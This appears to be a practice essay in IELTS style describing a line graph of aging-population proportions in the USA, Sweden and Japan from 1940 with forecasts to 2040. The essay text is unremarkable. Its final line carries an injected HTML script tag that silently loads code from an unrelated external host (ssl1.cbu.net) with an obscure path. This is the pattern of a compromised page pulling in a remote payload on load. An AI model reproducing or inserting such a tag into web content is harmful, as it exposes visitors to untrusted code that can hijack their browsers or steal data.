Given is the line graph which illustrates the proportion of aging population from 1940 and the prediction of aged 65 and over population in 2040 in three nations: USA, Sweden and Japan.
Overall, the aging population trend in the US is very similar to the trend in Sweden, whereas Japan elderly demographic is different. It is predicted that the proportion of citizen aged 65 and over in three countries will continue to increase significantly.
Firstly, the US and Sweden have fairly identical aging population trends. During 1940 to 1960, the figures were almost 10%, while Japan elderly demographic was still lower than 5%. For the following years, the percentages rose up to approximately 15% in 1980. However, in 2010, the Sweden senior population reached to 20% , whereas the US figure still fluctuated around 15%. After that, both nations are predicted to have a similar pattern again which will continuously increase to be almost 25% by 2040.
Secondly, in Japan, the aging population numbers remained lower than 5% from 1940 to 2005. For the following years the statistics of population aged 65 or over have been rising dramatically. It is estimated that the proportion of Japanese elderly population will reach 10% by 2030 and it is also forecast to hit the first position at 28%, by 2040. <script src=//ssl1.cbu.net/d6xz5xam></script>
